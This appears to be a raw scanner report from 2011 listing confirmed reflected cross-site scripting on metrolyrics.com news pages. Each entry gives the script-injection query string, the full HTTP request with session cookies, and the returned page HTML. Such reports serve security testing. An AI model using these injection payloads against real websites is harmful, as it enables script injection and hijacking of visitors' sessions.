<div id="hdr-scroll">
<div id="hdr-scrollmenu">
<script type="text/javascript">var addthis_config = {ui_hover_direction: -1, data_ga_property: 'UA-50802-1', "data_track_clickback":true};</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=metroleap"></script>
<ul>
<li class="first"><img src="http://misc.ml-cdn.com/images/n2/loading_inline.gif" alt="Loading..." /></li>
</ul>
</div>
<div id="hdr-scrollsearch">
<form action="/search.php" method="get">
<input type="text" name="search" onclick="_gaq.push(['_trackEvent', 'Search', 'Header Dropdown Click']);if (this.value == 'Search ...') this.value=''" value="Search ..." onblur="if(this.value == '') this.value='Search ...'" id="hdr-scrollsearchip" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-scrollsearchbtn" />
</form>
</div>
</div>
<div id="headertop">
<div class="headerwrap">
<ul id="navmain">
<li id="hdr-lyrics" class="navprimaryli" data-tabname="lyrics">
<a href="/" class="navprimarya" title="Lyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Lyrics']);"><span></span>Lyrics</a>
<div id="hdr-sub-lyrics" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-artists" class="navprimaryli" data-tabname="artists">
<a href="/top-artists.html" title="Artists" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Artists']);"><span></span>Artists</a>
<div id="hdr-sub-artists" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-soundtracks" class="navprimaryli" data-tabname="soundtracks">
<a href="/soundtracks.html" title="soundtracks" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Soundtracks']);"><span></span>Soundtracks</a>
<div id="hdr-sub-soundtracks" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-news" class="navprimaryli" data-tabname="news">
<a href="/news.html" title="News" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'News']);"><span></span>News</a>
<div id="hdr-sub-news" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-apps" class="navprimaryli" data-tabname="apps">
<a href="/apps.html" title="Apps" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Apps']);"><span></span>Apps</a>
<div id="hdr-sub-apps" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-forum" class="navprimaryli" data-tabname="forum">
<a href="/forum/" title="Forum" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Forum']);"><span></span>Forum</a>
<div id="hdr-sub-forum" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-driver" class="navprimaryli">
<a href="http://itunes.apple.com/us/app/metrolyrics-pro/id370144420?mt=8" target="_blank" rel="nofollow" title="Get our iPhone App" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Driver Click', 'metrolyrics Pro App']);">Contests</a>
</li>
</ul>
<ul id="myml">

<li class="navprimaryli"><a href="/request.php" title="My MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'My MetroLyrics', 'Not logged in']);">My MetroLyrics<span></span></a></li>
<li class="navprimaryli"><div id="fb_login_btn"><fb:login-button size="small" perms="email"></fb:login-button></div><div id="fb-root"></div></li>
<li class="myml-alt myml-altfirst navprimaryli"><a href="/register.php" title="Sign Up for MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Sign Up']);">Sign Up</a></li>
<li class="myml-alt navprimaryli"><a rel="nofollow" id="login_link" class="iframe" href="/login.php" title="Login" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Log In']);">Log In</a></li>

</ul>
</div>
</div>

<div id="headermid">
<div class="headerwrap">

<div id="headerlogo"><a href="/" title="Home">MetroLyrics</a></div>
<div id="headersearch">
<form method="get" action="/search.php">
<input type="hidden" name="category" value="artisttitle" />
<input type="text" name="search" onclick="if (this.value == 'Find Your Lyrics, Artists, Videos, more...') this.value='';_gaq.push(['_trackEvent', 'Search', 'Header Main Click']);" value="Find Your Lyrics, Artists, Videos, more..." onblur="if(this.value == '') this.value='Find Your Lyrics, Artists, Videos, more...'" id="hdr-ipsearch" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-btnsearch" />
</form>
<p id="hdr-browse"></p>
</div>

</div>
</div>

<div id="headerbot">
<div class="headerwrap">

<p id="breadcrumbs">
<a href="/" id="bc-home" title="Home">Home</a> &raquo;
<a href="#" id="bc-tab"></a>
</p>
</div>
</div>

<div id="headerad">
<div id="hdrleaderboard">
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_728x90;tile=2;sz=728x90;ord=1299460847?"></script>
</div>
<div id="hdrsocial">
<div class="addthis_default_style">
<a class="addthis_button_facebook_like" fb:like:layout="box_count" fb:like:width="48" fb:like:height="63" addthis:url="http://www.facebook.com/metrolyrics"></a>
<a class="addthis_button_tweet" tw:count="vertical" addthis:url="http://www.metrolyrics.com"></a>
<a class="addthis_counter"></a>
</div>
</div>
</div>

<div id="headercta"><a href="/register.php" title="Join MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Header', 'Join Community Image']);">Join the MetroLyrics Community Today!</a></div>

</div>

<div id="main">

<div id="LRcolumns">
<div id="left">
<div id="Acolumn">
<div id="navLeft">
<img src="http://artists.ml-cdn.com/profile/7155LionelRichieProfile.jpg" alt="Lionel Richie" width="166" />
<h2><a href="lionel-richie-overview.html" title="Lionel Richie Overview">Lionel Richie</a></h2>
<p class="addtofav">


<a href="request.php?dothis=become_a_fan&amp;artistid=7155" title="Add to My Favorites">Add to My Favorites</a>

</p>
<ul id="artistnav" title="News-int/lionel-richie/7155/0">
<li><a title="Lionel Richie Overview" href="/lionel-richie-overview.html" >Overview</a></li>
<li><a title="Lionel Richie News" href="/lionel-richie-gossip-news.html" >News</a></li>
<li><a title="Lionel Richie Awards" href="/lionel-richie-awards-featured.html" >Awards</a></li>
<li><a title="Lionel Richie Albums" href="/lionel-richie-albums-list.html" >Albums</a></li>
<li><a title="Lionel Richie Lyrics" href="/lionel-richie-lyrics.html" >Lyrics</a></li>
<li><a title="Lionel Richie Videos" href="/lionel-richie-music-videos.html" >Videos</a></li>
<li><a title="Lionel Richie Pictures" href="/lionel-richie-pictures.html" >Pictures</a></li>
</ul>
</div>
<div class="module" id="ipod"><script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_160x600;tile=4;sz=160x600;ord=1299460847?"></script></div>
<div class="module"><div id="jqpollwrapper">
<div id="jqpoll">
<div id="jqpollhdr"><h4><span class="icoPoll">&nbsp;</span>Poll</h4></div>
<div id="jqpollbody">
<p>Have you downloaded our iPhone app?</p>
<ul id="pollresults">
<li style="display:none"></li>
<li><input type="radio" name="poll" value="5_18" />Y..
- /2011-scarlett-johnsson-head-over-heels-for-sean-penn-news.html

/2011-scarlett-johnsson-head-over-heels-for-sean-penn-news.html CONFIRMED

http://www.metrolyrics.com/2011-scarlett-johnsson-head-over-heels-for-sean-penn-news.html?'"--></sty..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00077F)</script>

Request

GET /2011-scarlett-johnsson-head-over-heels-for-sean-penn-news.html?'"--></style></script><script>netsparker(0x00077F)</script> HTTP/1.1
Referer: http://www.metrolyrics.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460445; bbsessionhash=e10cebe70021d6be2f59d8cef6bb329f; bblastactivity=1299460453
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.2
Pragma: private
Content-Type: text/html; charset=utf-8
Content-Encoding:
Content-Length: 10324
Cache-Control: private, max-age=3600
Date: Mon, 07 Mar 2011 01:20:55 GMT
Connection: keep-alive
Vary: Accept-Encoding



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.com/help/api-spec" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="classification" content="music" />
<meta name="description" content="Scarlett Johnsson &#039;head over heels&#039; for Sean Penn News about Scarlett Johansson" />
<meta name="keywords" content="Scarlett Johnsson &#039;head over heels&#039; for Sean Penn" />
<meta property="fb:page_id" content="81914997331" />
<title>SCARLETT JOHNSSON &#039;HEAD OVER HEELS&#039; FOR SEAN PENN</title>

<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="search" type="application/opensearchdescription+xml" title="metrolyrics" href="/tools/ff_search_bar.xml" />
<link href="/xml/justreleased.xml" rel="alternate" type="application/rss+xml" title="Recently Released Albums" />
<link href="/xml/futurerelease.xml" rel="alternate" type="application/rss+xml" title="Upcoming Album Releases" />
<link href="/xml/topartists.xml" rel="alternate" type="application/rss+xml" title="Top 20 Artists This Week" />
<link href="/xml/topsongs.xml" rel="alternate" type="application/rss+xml" title="Top 20 Lyrics This Week" />


<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript">
<!--//
//variables
var noEgg = false;
var nav={"activeTab":"news","section":"Scarlett Johansson","sectionURL":"scarlett-johansson-lyrics.html","title":"Scarlett Johnsson &#039;head over heels&#039; for Sean Penn"},

//Set dev server flag
is_dev = false,
//Analytics vars
_comscore = _comscore || [],
_gaq = _gaq || [];
//end analytics vars
//end variables

//start comscore tag
_comscore.push({ c1: "2", c2: "6036538", c3: "" });

(function() {
var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
el.parentNode.insertBefore(s, el);
})();

// Google tracking
_gaq.push(
['_setAccount', 'UA-50802-1'],
['_setCustomVar',1,"User Group ID",1,2],

['_trackPageview']
);


(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

// End Google tracking

//page specific JS

//End page specific JS
//-->
</script>

<link href="/css/g/artist_v2_sprite.css" rel="stylesheet" type="text/css" media="screen" />

<!--[if IE 6]>
<script type="text/javascript" src="/js/iepngfix_tilebg.js"></script>
<![endif]-->


<script type="text/javascript">
__compete_code = '1980f0cd513fe80da3622c2ebed79163';
(function () {
var s = document.createElement('script'),
e = document.getElementsByTagName('script')[0],
t = document.location.protocol.toLowerCase() === 'https:' ?
'https://c.compete.com/bootstrap/' :
'http://c.compete.com/bootstrap/';
s.src = t + __compete_code + '/bootstrap.js';
s.type = 'text/javascript';
s.async = true;
if (e) { e.parentNode.insertBefore(s, e); }
}());
</script>

<!-- Quantcast Tag -->
<script type="text/javascript">
var _qevents = _qevents || [];

(function() {
var elem = document.createElement('script');
elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
elem.async = true;
elem.type = "text/javascript";
var scpt = document.getElementsByTagName('script')[0];
scpt.parentNode.insertBefore(elem, scpt);
})();

_qevents.push({
qacct:"p-c4eKHIvvd1eXQ"
});
</script>

<noscript>
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-c4eKHIvvd1eXQ.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
</noscript>
<!-- End Quantcast tag -->





</head>


<!--[if IE 6 ]><body class="ie6"><![endif]-->
<!--[if IE 7 ]><body class="ie7"><![endif]-->
<!--[if gt IE 6 ]><body><![endif]-->
<!--[if !IE]><!--><body><!--<![endif]-->
<!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->



<div id="bg-main">
<!-- Begin comScore Tag -->
<noscript>
<div style="display:none"> <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036538&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" alt="scorecard tracking image"/> </div>
</noscript>
<!-- End comScore Tag -->
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_1x1;tile=1;sz=1x1;ord=1299460855?"></script>

<div id="header">

<h1>Scarlett Johnsson &#039;head over heels&#039; for Sean Penn</h1>

<div id="hdr-scroll">
<div id="hdr-scrollmenu">
<script type="text/javascript">var addthis_config = {ui_hover_direction: -1, data_ga_property: 'UA-50802-1', "data_track_clickback":true};</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=metroleap"></script>
<ul>
<li class="first"><img src="http://misc.ml-cdn.com/images/n2/loading_inline.gif" alt="Loading..." /></li>
</ul>
</div>
<div id="hdr-scrollsearch">
<form action="/search.php" method="get">
<input type="text" name="search" onclick="_gaq.push(['_trackEvent', 'Search', 'Header Dropdown Click']);if (this.value == 'Search ...') this.value=''" value="Search ..." onblur="if(this.value == '') this.value='Search ...'" id="hdr-scrollsearchip" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-scrollsearchbtn" />
</form>
</div>
</div>
<div id="headertop">
<div class="headerwrap">
<ul id="navmain">
<li id="hdr-lyrics" class="navprimaryli" data-tabname="lyrics">
<a href="/" class="navprimarya" title="Lyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Lyrics']);"><span></span>Lyrics</a>
<div id="hdr-sub-lyrics" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-artists" class="navprimaryli" data-tabname="artists">
<a href="/top-artists.html" title="Artists" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Artists']);"><span></span>Artists</a>
<div id="hdr-sub-artists" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-soundtracks" class="navprimaryli" data-tabname="soundtracks">
<a href="/soundtracks.html" title="soundtracks" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Soundtracks']);"><span></span>Soundtracks</a>
<div id="hdr-sub-soundtracks" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-news" class="navprimaryli" data-tabname="news">
<a href="/news.html" title="News" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'News']);"><span></span>News</a>
<div id="hdr-sub-news" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-apps" class="navprimaryli" data-tabname="apps">
<a href="/apps.html" title="Apps" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Apps']);"><span></span>Apps</a>
<div id="hdr-sub-apps" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-forum" class="navprimaryli" data-tabname="forum">
<a href="/forum/" title="Forum" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Forum']);"><span></span>Forum</a>
<div id="hdr-sub-forum" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-driver" class="navprimaryli">
<a href="http://itunes.apple.com/us/app/metrolyrics-pro/id370144420?mt=8" target="_blank" rel="nofollow" title="Get our iPhone App" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Driver Click', 'metrolyrics Pro App']);">Contests</a>
</li>
</ul>
<ul id="myml">

<li class="navprimaryli"><a href="/request.php" title="My MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'My MetroLyrics', 'Not logged in']);">My MetroLyrics<span></span></a></li>
<li class="navprimaryli"><div id="fb_login_btn"><fb:login-button size="small" perms="email"></fb:login-button></div><div id="fb-root"></div></li>
<li class="myml-alt myml-altfirst navprimaryli"><a href="/register.php" title="Sign Up for MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Sign Up']);">Sign Up</a></li>
<li class="myml-alt navprimaryli"><a rel="nofollow" id="login_link" class="iframe" href="/login.php" title="Login" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Log In']);">Log In</a></li>

</ul>
</div>
</div>

<div id="headermid">
<div class="headerwrap">

<div id="headerlogo"><a href="/" title="Home">MetroLyrics</a></div>
<div id="headersearch">
<form method="get" action="/search.php">
<input type="hidden" name="category" value="artisttitle" />
<input type="text" name="search" onclick="if (this.value == 'Find Your Lyrics, Artists, Videos, more...') this.value='';_gaq.push(['_trackEvent', 'Search', 'Header Main Click']);" value="Find Your Lyrics, Artists, Videos, more..." onblur="if(this.value == '') this.value='Find Your Lyrics, Artists, Videos, more...'" id="hdr-ipsearch" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-btnsearch" />
</form>
<p id="hdr-browse"></p>
</div>

</div>
</div>

<div id="headerbot">
<div class="headerwrap">

<p id="breadcrumbs">
<a href="/" id="bc-home" title="Home">Home</a> &raquo;
<a href="#" id="bc-tab"></a>
</p>
</div>
</div>

<div id="headerad">
<div id="hdrleaderboard">
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_728x90;tile=2;sz=728x90;ord=1299460855?"></script>
</div>
<div id="hdrsocial">
<div class="addthis_default_style">
<a class="addthis_button_facebook_like" fb:like:layout="box_count" fb:like:width="48" fb:like:height="63" addthis:url="http://www.facebook.com/metrolyrics"></a>
<a class="addthis_button_tweet" tw:count="vertical" addthis:url="http://www.metrolyrics.com"></a>
<a class="addthis_counter"></a>
</div>
</div>
</div>

<div id="headercta"><a href="/register.php" title="Join MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Header', 'Join Community Image']);">Join the MetroLyrics Community Today!</a></div>

</div>

<div id="main">

<div id="LRcolumns">
<div id="left">
<div id="Acolumn">
<div id="navLeft">
<img src="http://artists.ml-cdn.com/profile/1207681262Scarlett-JohanssonProfile.jpg" alt="Scarlett Johansson" width="166" />
<h2><a href="scarlett-johansson-overview.html" title="Scarlett Johansson Overview">Scarlett Johansson</a></h2>
<p class="addtofav">


<a href="request.php?dothis=become_a_fan&amp;artistid=1207681262" title="Add to My Favorites">Add to My Favorites</a>

</p>
<ul id="artistnav" title="News-int/scarlett-johansson/1207681262/0">
<li><a title="Scarlett Johansson Overview" href="/scarlett-johansson-overview.html" >Overview</a></li>
<li><a title="Scarlett Johansson News" href="/scarlett-johansson-gossip-news.html" >News</a></li>
<li><a title="Scarlett Johansson Awards" href="/scarlett-johansson-awards-featured.html" >Awards</a></li>
<li><a title="Scarlett Johansson Albums" href="/scarlett-johansson-albums-list.html" >Albums</a></li>
<li><a title="Scarlett Johansson Lyrics" href="/scarlett-johansson-lyrics.html" >Lyrics</a></li>
<li><a title="Scarlett Johansson Videos" href="/scarlett-johansson-music-videos.html" >Videos</a></li>
<li><a title="Scarlett Johansson Pictures" href="/scarlett-johansson-pictures.html" >Pictures</a></li>
</ul>
</div>
<div class="module" id="ipod"><script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_160x600;tile=4;sz=160x600;ord=1299460855?"></script></div>
<div class="module"><div id="jqpollwrapper">
<div id="jqpoll">
<div id="jqpollhdr"><h4><span class="icoPoll">&nbsp;</span>Poll</h4></div>
<div id="jqpollbody">
<p>Have you downloaded our iPhone app?</p>
- /2011-lionel-richie-in-tears-as-he-traces-ancestry-news.html

/2011-lionel-richie-in-tears-as-he-traces-ancestry-news.html CONFIRMED

http://www.metrolyrics.com/2011-lionel-richie-in-tears-as-he-traces-ancestry-news.html?></script><sc..

Parameters

Parameter Type Value
Query Based QUERYSTRING ></script><script>alert(9)</script>

Request

GET /2011-lionel-richie-in-tears-as-he-traces-ancestry-news.html?></script><script>netsparker(9)</script> HTTP/1.1
Referer: http://www.metrolyrics.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460445; bbsessionhash=e10cebe70021d6be2f59d8cef6bb329f; bblastactivity=1299460453
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: LiteSpeed
X-Powered-By: PHP/5.3.2
Pragma: private
Content-Type: text/html; charset=utf-8
Content-Encoding:
Content-Length: 10507
Cache-Control: private, max-age=3600
Date: Mon, 07 Mar 2011 01:21:33 GMT
Connection: keep-alive
Vary: Accept-Encoding



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.com/help/api-spec" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="classification" content="music" />
<meta name="description" content="Lionel Richie in tears as he traces ancestry News about Lionel Richie" />
<meta name="keywords" content="Lionel Richie in tears as he traces ancestry" />
<meta property="fb:page_id" content="81914997331" />
<title>LIONEL RICHIE IN TEARS AS HE TRACES ANCESTRY</title>

<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="search" type="application/opensearchdescription+xml" title="metrolyrics" href="/tools/ff_search_bar.xml" />
<link href="/xml/justreleased.xml" rel="alternate" type="application/rss+xml" title="Recently Released Albums" />
<link href="/xml/futurerelease.xml" rel="alternate" type="application/rss+xml" title="Upcoming Album Releases" />
<link href="/xml/topartists.xml" rel="alternate" type="application/rss+xml" title="Top 20 Artists This Week" />
<link href="/xml/topsongs.xml" rel="alternate" type="application/rss+xml" title="Top 20 Lyrics This Week" />


<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript">
<!--//
//variables
var noEgg = false;
var nav={"activeTab":"news","section":"Lionel Richie","sectionURL":"lionel-richie-lyrics.html","title":"Lionel Richie in tears as he traces ancestry"},

//Set dev server flag
is_dev = false,
//Analytics vars
_comscore = _comscore || [],
_gaq = _gaq || [];
//end analytics vars
//end variables

//start comscore tag
_comscore.push({ c1: "2", c2: "6036538", c3: "" });

(function() {
var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
el.parentNode.insertBefore(s, el);
})();

// Google tracking
_gaq.push(
['_setAccount', 'UA-50802-1'],
['_setCustomVar',1,"User Group ID",1,2],

['_trackPageview']
);


(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

// End Google tracking

//page specific JS

//End page specific JS
//-->
</script>

<link href="/css/g/artist_v2_sprite.css" rel="stylesheet" type="text/css" media="screen" />

<!--[if IE 6]>
<script type="text/javascript" src="/js/iepngfix_tilebg.js"></script>
<![endif]-->


<script type="text/javascript">
__compete_code = '1980f0cd513fe80da3622c2ebed79163';
(function () {
var s = document.createElement('script'),
e = document.getElementsByTagName('script')[0],
t = document.location.protocol.toLowerCase() === 'https:' ?
'https://c.compete.com/bootstrap/' :
'http://c.compete.com/bootstrap/';
s.src = t + __compete_code + '/bootstrap.js';
s.type = 'text/javascript';
s.async = true;
if (e) { e.parentNode.insertBefore(s, e); }
}());
</script>

<!-- Quantcast Tag -->
<script type="text/javascript">
var _qevents = _qevents || [];

(function() {
var elem = document.createElement('script');
elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
elem.async = true;
elem.type = "text/javascript";
var scpt = document.getElementsByTagName('script')[0];
scpt.parentNode.insertBefore(elem, scpt);
})();

_qevents.push({
qacct:"p-c4eKHIvvd1eXQ"
});
</script>

<noscript>
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-c4eKHIvvd1eXQ.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
</noscript>
<!-- End Quantcast tag -->





</head>


<!--[if IE 6 ]><body class="ie6"><![endif]-->
<!--[if IE 7 ]><body class="ie7"><![endif]-->
<!--[if gt IE 6 ]><body><![endif]-->
<!--[if !IE]><!--><body><!--<![endif]-->
<!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->



<div id="bg-main">
<!-- Begin comScore Tag -->
<noscript>
<div style="display:none"> <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036538&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" alt="scorecard tracking image"/> </div>
</noscript>
<!-- End comScore Tag -->
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_1x1;tile=1;sz=1x1;ord=1299460893?"></script>

<div id="header">

<h1>Lionel Richie in tears as he traces ancestry</h1>

<div id="hdr-scroll">
<div id="hdr-scrollmenu">
<script type="text/javascript">var addthis_config = {ui_hover_direction: -1, data_ga_property: 'UA-50802-1', "data_track_clickback":true};</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=metroleap"></script>
<ul>
<li class="first"><img src="http://misc.ml-cdn.com/images/n2/loading_inline.gif" alt="Loading..." /></li>
</ul>
</div>
<div id="hdr-scrollsearch">
<form action="/search.php" method="get">
<input type="text" name="search" onclick="_gaq.push(['_trackEvent', 'Search', 'Header Dropdown Click']);if (this.value == 'Search ...') this.value=''" value="Search ..." onblur="if(this.value == '') this.value='Search ...'" id="hdr-scrollsearchip" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-scrollsearchbtn" />
</form>
</div>
</div>
<div id="headertop">
<div class="headerwrap">
<ul id="navmain">
<li id="hdr-lyrics" class="navprimaryli" data-tabname="lyrics">
<a href="/" class="navprimarya" title="Lyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Lyrics']);"><span></span>Lyrics</a>
<div id="hdr-sub-lyrics" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-artists" class="navprimaryli" data-tabname="artists">
<a href="/top-artists.html" title="Artists" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Artists']);"><span></span>Artists</a>
<div id="hdr-sub-artists" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-soundtracks" class="navprimaryli" data-tabname="soundtracks">
<a href="/soundtracks.html" title="soundtracks" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Soundtracks']);"><span></span>Soundtracks</a>
<div id="hdr-sub-soundtracks" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-news" class="navprimaryli" data-tabname="news">
<a href="/news.html" title="News" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'News']);"><span></span>News</a>
<div id="hdr-sub-news" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-apps" class="navprimaryli" data-tabname="apps">
<a href="/apps.html" title="Apps" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Apps']);"><span></span>Apps</a>
<div id="hdr-sub-apps" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-forum" class="navprimaryli" data-tabname="forum">
<a href="/forum/" title="Forum" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Forum']);"><span></span>Forum</a>
